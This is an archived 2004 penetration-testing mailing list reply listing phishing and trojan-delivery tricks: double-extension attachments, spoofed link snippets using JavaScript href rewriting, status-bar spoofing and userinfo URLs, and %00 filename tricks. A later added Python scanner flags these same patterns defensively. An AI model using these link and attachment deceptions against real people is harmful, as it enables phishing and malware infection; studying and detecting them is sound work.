Penetration Testing mailing list archives

Re: Social Engineering Website (URL obfuscation/hiding)


From: Martin Mačok <martin.macok () underground cz>
Date: Sat, 10 Jan 2004 08:59:16 +0100

On Fri, Jan 09, 2004 at 06:32:48AM -0800, Random Task wrote:

As a last note, we'd need to get people to go there. Making it look
legit would be good. (i.e. use the %00 IE exploit to make the URL
look like it's internal and make the site look like their own) Any
techniques or message styles you've used and had success with?

 - send the trojan code in an email attachment with a good old
   something.JPG.scr trick (if you can go to them, they don't have to
   go to you)
   - some content filters disallow .scr, so try .lnk also
 - send a link to the trojan file, in typical MS Outlook environment,
   they just have to click on it and select "Open"
   - use unique URL/file for each target (so you can track downloads
     and email forwards)

URL obfuscation/hiding:

        <script language="JavaScript">
        <!--
        function changehref()
        {
           document.all("obj").href = "http://www.fakesite.com";
           return 1 ;
        }
        //-->
        </script>

        [snip]

        <a href="http://www.realsite.com/" id="obj"
        onclick="changehref();">www.fakesite.com</a>

Similar trick:

        <a href="http://www.realsite.com"
        onmouseover="window.status=('http://www.fakesite.com/'); return
        true;">www.fakesite.com</a>

A more recent scam trick:

        <a
        href="http://www.fakesite.com:something_ugly_long@www.realsite.com/">
        www.fakesite.com</a>

Other MS IE trick (the browser believes it is HTML instead of an EXE):

        http://server/file.exe?.html

As you mention, MS IE's (and possibly some other browsers') %00 trick:

        README.TXT%00PROG.EXE in Content-disposition:
        (there are many different tricks with %00)

See also:
http://www.infohacking.com/INFOHACKING_RESEARCH/Our_Advisories/IE/index.html
http://www.solutions.fi/iebug2

-- 
         Martin Mačok                 http://underground.cz/
   martin.macok () underground cz        http://Xtrmntr.org/ORBman/
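The message above lists several ways a link or attachment can be made to look like something it is not. The following is an added example, not code from the message or from any product, showing how a mail gateway or link scanner could flag those same patterns on the receiving side: visible link text naming a different host than the href, userinfo before "@" in the URL, inline handlers that rewrite window.status or the href, an executable path with a ".html" query suffix, and attachment names using double extensions or "%00". The sample anchors and filenames are constructed for the example (they reuse the hostnames from the post), and the finding labels are my own.

```python
"""Added example: flag the link and attachment deceptions listed in the post.

Runs offline over constructed sample input; the finding labels are invented
for this example and are not from any product or the original message.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Extensions that Windows treats as executable when double-clicked.
RISKY_EXTENSIONS = {".exe", ".scr", ".lnk", ".pif", ".com", ".bat", ".cmd", ".vbs"}

# Visible link text that looks like a hostname: optional scheme, optional www.,
# then at least two dot-separated labels.
HOST_TEXT_RE = re.compile(r"^(?:https?://)?(?:www\.)?([a-z0-9-]+(?:\.[a-z0-9-]+)+)", re.I)


class _AnchorCollector(HTMLParser):
    """Collect (attributes, visible text) for every <a> element."""

    def __init__(self):
        super().__init__()
        self.anchors = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._current = (dict(attrs), [])

    def handle_data(self, data):
        if self._current is not None:
            self._current[1].append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._current is not None:
            attrs, parts = self._current
            self.anchors.append((attrs, "".join(parts).strip()))
            self._current = None


def check_anchor(attrs, text):
    """Return the deception patterns found on one anchor (empty list if none)."""
    findings = []
    href = attrs.get("href") or ""
    url = urlsplit(href)

    # "fakesite.com:...@realsite.com": everything before "@" is userinfo, not the host.
    if "@" in url.netloc:
        findings.append("userinfo-in-url")

    # The visible text names one host while the href resolves to another.
    real_host = re.sub(r"^www\.", "", (url.hostname or "").lower())
    shown = HOST_TEXT_RE.match(text)
    if shown and real_host and shown.group(1).lower() != real_host:
        findings.append("text-host-mismatch")

    # Handlers that rewrite the status bar or the href after the page is shown.
    for attr in ("onclick", "onmouseover", "onmousedown"):
        code = attrs.get(attr) or ""
        if "window.status" in code or ".href" in code:
            findings.append(f"{attr}-rewrites-link")

    # "file.exe?.html": executable path with a query string that reads like an extension.
    ext = "." + url.path.rsplit(".", 1)[-1].lower() if "." in url.path else ""
    if ext in RISKY_EXTENSIONS and re.search(r"\.html?$", url.query, re.I):
        findings.append("executable-disguised-as-html")

    return findings


def scan_html(html):
    """Return one record per anchor: href, visible text, and its findings."""
    collector = _AnchorCollector()
    collector.feed(html)
    return [
        {"href": attrs.get("href") or "", "text": text, "findings": check_anchor(attrs, text)}
        for attrs, text in collector.anchors
    ]


def check_attachment_name(filename):
    """Flag %00 / NUL tricks and executable or double extensions in a filename."""
    findings = []
    name = filename.replace("\x00", "%00")
    if "%00" in name:
        findings.append("null-byte-in-filename")
    pieces = name.lower().split(".")
    ext = "." + pieces[-1] if len(pieces) > 1 else ""
    if ext in RISKY_EXTENSIONS:
        findings.append("executable-extension")
        if len(pieces) > 2:
            findings.append("double-extension")
    return findings


# Constructed sample: the anchors from the post plus one benign link.
SAMPLE_HTML = """
<a href="http://www.realsite.com/" id="obj" onclick="changehref();">www.fakesite.com</a>
<a href="http://www.realsite.com" onmouseover="window.status=('http://www.fakesite.com/'); return true;">www.fakesite.com</a>
<a href="http://www.fakesite.com:something_ugly_long@www.realsite.com/">www.fakesite.com</a>
<a href="http://server/file.exe?.html">quarterly report</a>
<a href="http://www.example.org/docs/">www.example.org</a>
"""

if __name__ == "__main__":
    for record in scan_html(SAMPLE_HTML):
        print(record["href"], "->", record["findings"] or "ok")
    for name in ("something.JPG.scr", "README.TXT%00PROG.EXE", "invoice.pdf"):
        print(name, "->", check_attachment_name(name) or "ok")
```

The first anchor is caught only by the host mismatch, since its onclick calls a function defined elsewhere; a scanner that also wants to catch that case has to look at the page's scripts for assignments to the anchor's href, which this example leaves out.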
